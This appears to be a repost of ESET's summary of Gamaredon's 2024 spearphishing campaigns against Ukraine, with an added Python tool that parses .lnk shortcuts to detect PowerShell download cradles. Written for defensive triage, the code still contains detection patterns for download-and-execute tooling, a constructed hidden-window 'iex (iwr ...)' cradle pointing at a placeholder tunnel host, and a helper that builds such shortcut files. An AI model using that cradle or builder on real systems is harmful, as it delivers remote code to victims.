Gamaredon in 2024: Cranking out spearphishing campaigns against Ukraine with an evolved toolset

Key points of this blog post:

  • Gamaredon refocused exclusively on targeting Ukrainian governmental institutions in 2024, abandoning prior attempts against NATO countries.
  • The group significantly increased the scale and frequency of its spearphishing campaigns, adding new delivery methods such as malicious hyperlinks and LNK files that execute PowerShell code fetched from Cloudflare-hosted domains.
  • Gamaredon introduced six new malware tools, leveraging PowerShell and VBScript, designed primarily for stealth, persistence, and lateral movement.
  • Existing tools received major upgrades, including enhanced obfuscation, improved stealth tactics, and sophisticated methods for lateral movement and data exfiltration.
  • Gamaredon operators hid almost all of their C&C infrastructure behind Cloudflare tunnels.
  • Gamaredon increasingly relied on third-party services (Telegram, Telegraph, Cloudflare, Dropbox) and on DNS-over-HTTPS (DoH) to protect its C&C infrastructure.
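The LNK-to-PowerShell delivery method listed above is straightforward to triage in bulk: a shortcut's target and command-line arguments are stored in plain StringData fields of the MS-SHLLINK format, so a few dozen lines of parsing are enough to pull out the PowerShell invocation and any URL it downloads from. The following is an added example written for this page; it is not ESET's code, and the two .lnk samples it builds are constructed here rather than real Gamaredon artefacts. The format constants come from Microsoft's public MS-SHLLINK specification. Two things are assumptions: that ANSI (non-Unicode) strings can be decoded as cp1252, and that a Cloudflare quick-tunnel URL is recognisable by a hostname under trycloudflare.com (the post itself only says "Cloudflare-hosted domains" and "Cloudflare tunnels"; a named tunnel on an operator-controlled zone would not match that check and is caught only by the generic download-cradle logic).

```python
"""Minimal .lnk StringData parser plus a PowerShell download-cradle check.
Added example, not from the original post; samples below are constructed."""
import re
import struct

# ShellLinkHeader facts from MS-SHLLINK: fixed 76-byte header and a fixed CLSID.
LNK_HEADER_SIZE = 0x4C
LNK_CLSID = bytes.fromhex("0114020000000000c000000000000046")  # {00021401-0000-0000-C000-000000000046}

HAS_LINK_TARGET_ID_LIST, HAS_LINK_INFO = 0x01, 0x02
HAS_NAME, HAS_RELATIVE_PATH, HAS_WORKING_DIR = 0x04, 0x08, 0x10
HAS_ARGUMENTS, HAS_ICON_LOCATION, IS_UNICODE = 0x20, 0x40, 0x80

# StringData entries appear in this fixed order, each present only when its flag is set.
STRING_FIELDS = ((HAS_NAME, "name"), (HAS_RELATIVE_PATH, "relative_path"),
                 (HAS_WORKING_DIR, "working_dir"), (HAS_ARGUMENTS, "arguments"),
                 (HAS_ICON_LOCATION, "icon_location"))


def is_shell_link(data: bytes) -> bool:
    """True when the buffer starts with a valid ShellLinkHeader."""
    return (len(data) >= LNK_HEADER_SIZE
            and struct.unpack_from("<I", data, 0)[0] == LNK_HEADER_SIZE
            and data[4:20] == LNK_CLSID)


def parse_lnk(data: bytes) -> dict:
    """Return the StringData fields (name, relative_path, working_dir, arguments, icon_location)."""
    if not is_shell_link(data):
        raise ValueError("not a shell link (bad HeaderSize or LinkCLSID)")
    flags = struct.unpack_from("<I", data, 20)[0]
    pos = LNK_HEADER_SIZE
    if flags & HAS_LINK_TARGET_ID_LIST:      # IDListSize (2 bytes) + IDList, which we do not need
        pos += 2 + struct.unpack_from("<H", data, pos)[0]
    if flags & HAS_LINK_INFO:                # LinkInfoSize includes the size field itself
        pos += struct.unpack_from("<I", data, pos)[0]
    unicode = bool(flags & IS_UNICODE)
    fields = {}
    for flag, name in STRING_FIELDS:
        if not flags & flag:
            continue
        count = struct.unpack_from("<H", data, pos)[0]   # character count, no terminator
        pos += 2
        nbytes = count * 2 if unicode else count
        raw = data[pos:pos + nbytes]
        if len(raw) != nbytes:
            raise ValueError(f"truncated {name} string")
        # Assumption: ANSI strings use cp1252; the spec says "system default code page".
        fields[name] = raw.decode("utf-16-le" if unicode else "cp1252")
        pos += nbytes
    return fields


def build_lnk(relative_path: str, arguments: str) -> bytes:
    """Build a minimal Unicode .lnk with only RELATIVE_PATH and COMMAND_LINE_ARGUMENTS set."""
    flags = HAS_RELATIVE_PATH | HAS_ARGUMENTS | IS_UNICODE
    header = struct.pack("<I", LNK_HEADER_SIZE) + LNK_CLSID + struct.pack("<I", flags)
    header += bytes(LNK_HEADER_SIZE - len(header))   # attributes, timestamps etc. zeroed
    enc = lambda s: struct.pack("<H", len(s)) + s.encode("utf-16-le")
    return header + enc(relative_path) + enc(arguments)


URL_RE = re.compile(r"https?://[^\s'\"<>()]+", re.I)
CRADLE_RE = re.compile(r"\b(iex|invoke-expression|iwr|invoke-webrequest|irm|invoke-restmethod|"
                       r"downloadstring|downloadfile|start-bitstransfer|curl|wget)\b", re.I)
# PowerShell accepts abbreviated switches: -w hidden, -WindowStyle Hidden, -ep bypass, -nop ...
STEALTH_RE = re.compile(r"-w[a-z]*\s+hidden|-e[a-z]*\s+bypass|-nop\w*", re.I)
TUNNEL_RE = re.compile(r"\.trycloudflare\.com\b", re.I)   # assumption: quick-tunnel hostnames


def assess_lnk(data: bytes) -> dict:
    """Classify a shortcut as suspicious when it launches PowerShell with a URL or download cradle."""
    fields = parse_lnk(data)
    args = fields.get("arguments", "")
    launcher = (fields.get("relative_path", "") + " " + args).lower()
    urls = URL_RE.findall(args)
    indicators = []
    if "powershell" in launcher or "pwsh" in launcher:
        indicators.append("launches-powershell")
    if STEALTH_RE.search(args):
        indicators.append("hidden-window-or-policy-bypass")
    if CRADLE_RE.search(args):
        indicators.append("download-cradle")
    if any(TUNNEL_RE.search(u) for u in urls):
        indicators.append("trycloudflare-tunnel-url")
    suspicious = "launches-powershell" in indicators and bool(urls or "download-cradle" in indicators)
    return {"fields": fields, "urls": urls, "indicators": indicators, "suspicious": suspicious}


# Constructed samples (hostname and paths are placeholders, not real indicators).
POWERSHELL_REL = r"..\..\..\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
CRADLE_ARGS = ('-NoProfile -WindowStyle Hidden -ExecutionPolicy Bypass -Command '
               '"iex (iwr -UseBasicParsing https://constructed-sample.trycloudflare.com/stage1)"')
MALICIOUS_LNK = build_lnk(POWERSHELL_REL, CRADLE_ARGS)
BENIGN_LNK = build_lnk(r"..\..\Windows\System32\notepad.exe", r"C:\Users\me\notes.txt")

if __name__ == "__main__":
    for label, blob in (("cradle", MALICIOUS_LNK), ("benign", BENIGN_LNK)):
        result = assess_lnk(blob)
        print(f"{label}: suspicious={result['suspicious']} indicators={result['indicators']}")
```

The parser deliberately skips the IDList and LinkInfo structures rather than decoding them, because the PowerShell launch line a phishing LNK depends on lives in RELATIVE_PATH and COMMAND_LINE_ARGUMENTS. On real samples, run `assess_lnk(open(path, "rb").read())` over an attachment quarantine or a user's Downloads folder; the extracted `urls` list is the value to pivot on when checking whether the download host is a Cloudflare tunnel or another third-party service of the kind the post describes.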

To read the complete article see: https://www.welivesecurity.com/en/eset-research/gamaredon-2024-cranking-out-spearphishing-campaigns-ukraine-evolved-toolset/

This post is licensed under CC BY 4.0 by the author.